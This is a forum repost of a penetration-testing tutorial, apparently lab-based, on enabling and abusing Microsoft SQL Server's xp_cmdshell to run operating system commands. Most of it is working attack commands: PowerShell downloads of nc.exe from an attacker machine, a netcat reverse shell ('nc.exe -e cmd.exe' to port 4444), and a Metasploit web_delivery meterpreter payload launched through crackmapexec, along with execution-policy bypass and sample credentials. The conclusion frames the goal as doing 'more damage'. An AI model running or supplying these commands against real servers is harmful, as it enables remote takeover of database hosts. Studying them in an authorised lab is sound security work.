You can register an iTabCode account to be able to view iTabCode without ads. ( Registration is Free ) Register Now

x32x01

ADMINISTRATOR
Staff Member
Today’s article is the third article in the series of MSSQL Server and its penetration Testing. In this article, we will be discovering and exploiting the security aspects of the xp_cmdshell functionality.

Table of Content
  • Introduction
    • What is xp_cmdshell?
  • Enabling xp_cmdshell
    • Manually (GUI)
    • sqsh
    • mssqlclient.py
    • Metasploit
  • Exploiting xp_cmdshell:
    • Metasploit
    • Netcat
    • Crackmapexec
    • Nmap
    • PowerUpSQL
  • Conclusion
Introduction
All the demonstrations in this article will be presented on the MSSQL Server. To get the MS-SQL server set up, you can refer to our article: Penetration Testing Lab Setup: MS-SQL. Previously, we have briefly discussed exploiting the xp_cmdshell functionality with the help of the Metasploit module: exploit/windows/mssql/mssql_payload in our article: MSSQL Penetration Testing with Metasploit. Although in that article, we didn’t explain the background of the xp_cmdshell functionality and its security aspect, which we will discuss.

What is xp_cmdshell?
According to the Official Microsoft Documentations, xp_cmdshell is a functionality that spawns a Windows command shell and passes in a string for execution. Any output that is generated by it is shown in the format of rows of text. To simplify, we can say that it allows the database administrators to access and execute any external process directly from the SQL Server. The implementation of the xp_cmdshell can be traced back to SQL Server 6.5. It was designed to use the SQL queries with the system command to automate various tasks that would require additional programming and working. Now that we have some knowledge about the xp_cmdshell, we can see how it can be enabled on an SQL server.

Enabling xp_cmdshell
Manually (GUI)

By default, the function of xp_cmdshell is disabled in the SQL server. We need to have administrator privileges to enable it. In the demonstration below, we are using the credentials of the SA user to log in on the SQL server.

1.png

Now that we have the SQL instance running as Administrator, we need to access the Object Explorer section. Here, we have the SQL Server Instance; we right-click on the instance to find a drop-down menu. We need to choose the “Facets” option from this menu, as demonstrated below:

2.png

Clicking on the Facets option will open a new window. It will have a field with the various types of facets available. We need to choose the Surface Area Configuration facets from the drop-down menu, as shown in the image below:

3.png

After choosing the surface area configuration facet, we see that we have the XPCmdShellEnabled option set as false.

4.png

Clicking on the XP command shell option, we change its value from false to true, as shown in the figure below. This way, we can enable XP command shell using the graphical user interface on a Windows MSSQL Server.

5.png

sqsh
Next, we are using the sqsh tool in the kali machine. To check whether the. XP command shell option is enabled on the target machine or not. The syntax for using this tool is quite simple, first type sqsh with the -S and the Target IP address followed by -U with the username of the server admin and -P with the password for that particular user as shown in the image below.
Code:
sqsh -S 192.168.1.146 -U sa -P "Password@1"
xp_cmdshell 'whoami';
go

10.png

As we can observe from the image, the SQL Server had blocked access to the procedure command shell; therefore, we will enable it now. To enable the XP command shell on the target machine using SQSH we will be running a series of commands that would first show the advanced options available within the SP configuration option. Then we will choose to execute the XP command shell option and activate it. Finally, we will run the reconfigure command that will enable the XP commercial option on the target machine, as shown in the image given below.
Code:
EXEC sp_configure 'show advanced options', 1;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
go
xp_cmdshell 'whoami';
go

11.png

The activity can be verified by checking similarly to what we did with the GUI option as before.
12.png

mssqlclient.py
MS SQL consists of windows services having service accounts. Whenever an instance of SQLserver is installed, a set of Windows services is also installed with unique names. Below are the SQL Server account types:
  • Windows Accounts
  • SQL Server Login
  • DB Users
To use mssqlclient.py, we need to specify the username, domain, password, the target IP address, and the Port hosting the MSSQL service as shown in the image. here we can use the command enable_xp_cmdshell to enable command shell functionality on the target machine.
Code:
python3 mssqlclient.py WORKGROUP/sa:Password@1@192.168.1.146 -port 1433
enable_xp_cmdshell

13.png

Again, we can verify it similarly to what we did with the GUI approach and the sqsh approach. Here we can see that we were able to enable the XP command shell functionality with the help of mssqlclient, which is a part of the Impact toolkit.
14.png

Previously, mssqlclient.py is used to connect the database through database credentials having username SA. Now we are connecting with the database by window’s user login credential.
15.png

Code:
python3 mssqlclient.py ignite:'Password@123'@192.168.1.146 -windows-auth
enable_xp_cmdshell

16.png

Metasploit
As usual, Metasploit also plays its role to enable the XP command shell and helps us exploit the target and provide the session.
Code:
use exploit/windows/mssql/mssql_payload
set rhosts 192.168.1.146
set password Password@1
exploit

20.png

The exploit does not stop at just enabling the XP command shell. It then runs a series of commands that can help to get us a meterpreter shell on the target machine as shown in the image below
21.png

Exploiting xp_cmdshell
Metasploit
You can use another exploit mssql_exec, which primarily enables the xp_cmd shell, and we can also set any cmd executable command. Here we set the cmd command to “ipconfig
Code:
use auxiliary/admin/mssql/mssql_exec
set rhosts 192.168.1.146
set password Password@1
set cmd "ipconfig"
exploit

22.png

Netcat
Here, we can use netcat to get a reverse connection on the target machine. To do so, we first need to transfer the netcat binary file to the Windows machine. For this, we will use the nc.exe executable. This file is located at /usr/share/windows-binaries. Then we can use the Python one-liner to create an HTTP service.
Code:
cd /usr/share/windows-binaries
ls -al
python -m SimpleHTTPServer 80

30.png

Here, the powershell.exe cmdlet invokes PowerShell and then uses the wget command to download netcat into the C:/Users/Public directory, which has access to write. Then we will use the XP command shell to execute the netcat binary to run cmd.exe. To the creating a reverse connection to the host Kali Machine on Port 4444.
Code:
xp_cmdshell "powershell.exe wget http://192.168.1.2/nc.exe -OutFile c:\\Users\Public\\nc.exe"
xp_cmdshell  "c:\\Users\Public\\nc.exe -e cmd.exe 192.168.1.2 4444"

31.png

In Kali Linux, we have a netcat listener on port 4444; once the PowerShell command will execute as shown in the above screenshot, we will get the shell of the target machine.
Code:
nc -lvp 4444
whoami

32.png

Crackmapexec
Another method to get a reverse connection on the target machine from the MSSQL XP command Shell functionality is by using its ability to run system commands associated with the web_delivery payload. The process is quite simple; we use the exploit/multi/script/web_delivery exploit, set the target as the Windows machine then set the payload as windows/meterpeter/reverse_tcp. Then specify the localhost. Finally, we will run the exploit command.
Code:
use exploit/multi/script/web_delivery
set target 2
set payload windows/meterpreter/revese_tcp
set lhost 192.168.1.2
exploit

45.png

Through the above exploit, we get the web_delivery URL, and this URL we will use in the execution of crackmapexec, command of web_delivery.
Code:
crackmapexec mssql 192.168.1.146 -u 'ignite' -p 'Password@123' -M web_delivery -o URL=http://192.168.1.2:8080/om6cxs3B

46.png

The output of the crackmapexec shows that the target has been pwned. We can go back to the Metasploit shell and find that the target has been exploited successfully, and we have a meterpreter shell on the target machine.
47.png

Nmap
As we know, the XP-cmd function is disabled by default, but if we have sysadmin credentials, we can also play with the NMap script to execute the window’s commands.
Code:
nmap -p 1433 –script ms-sql-xp-cmdshell –script-args mssql.username=sa,mssql.passsword=Password@1,ms-sql-xp-cmdshell.cmd=’net user’ 192.168.1.146

48.png

PowerUpSQL
First, Download the PowerUpSql from here. PowerUpSQL is a tool for Windows machines, includes functions that support SQL Server discovery, weak configuration auditing, privilege escalation on the scale, and post-exploitation actions such as OS command execution.

We can use the Import-Module cmdlet to import the PowerShell Script. Then use the Invoke-SQLOSCmd function, which runs the OS commands via xp_cmd shell through the SQL service account.

Here, PowerUpSQL tries to connect with the database. After the connection is successful, it checks if the user credentials that we have provided are for sysadmin or the users that we have provided have sysadmin access or not. It first enables the advanced options and then tries to enable the XP command shell functionality. Here, in this demonstration, the XP commands functionality is already enabled, so the tool runs the whoami command, which shows that we are the user and nt service/MSSQL$sqlexpress user.
Code:
cd PowerUPSQL-master
powershell
powershell -ep bypass
Import-Module .\PowerUpSQL.ps1
Invoke-SQLOSCmd -Username sa -Password Password@1 -Instance  WIN-P83OS778EQK\SQLEXPRESS –Command whoami –Verbose

50.png

Conclusion
This article was designed to provide the users with possible content that can help them whenever they want to perform penetration testing on MSSQL Servers by exploiting XP command shell functionality. The point of this article is not to speculate on how the user can get the credentials or how they were able to elevate its sysadmin access. Instead, when or if the user could get those privileges, they can move on to extract and execute multiple commands on the target system and do more damage.
 
Top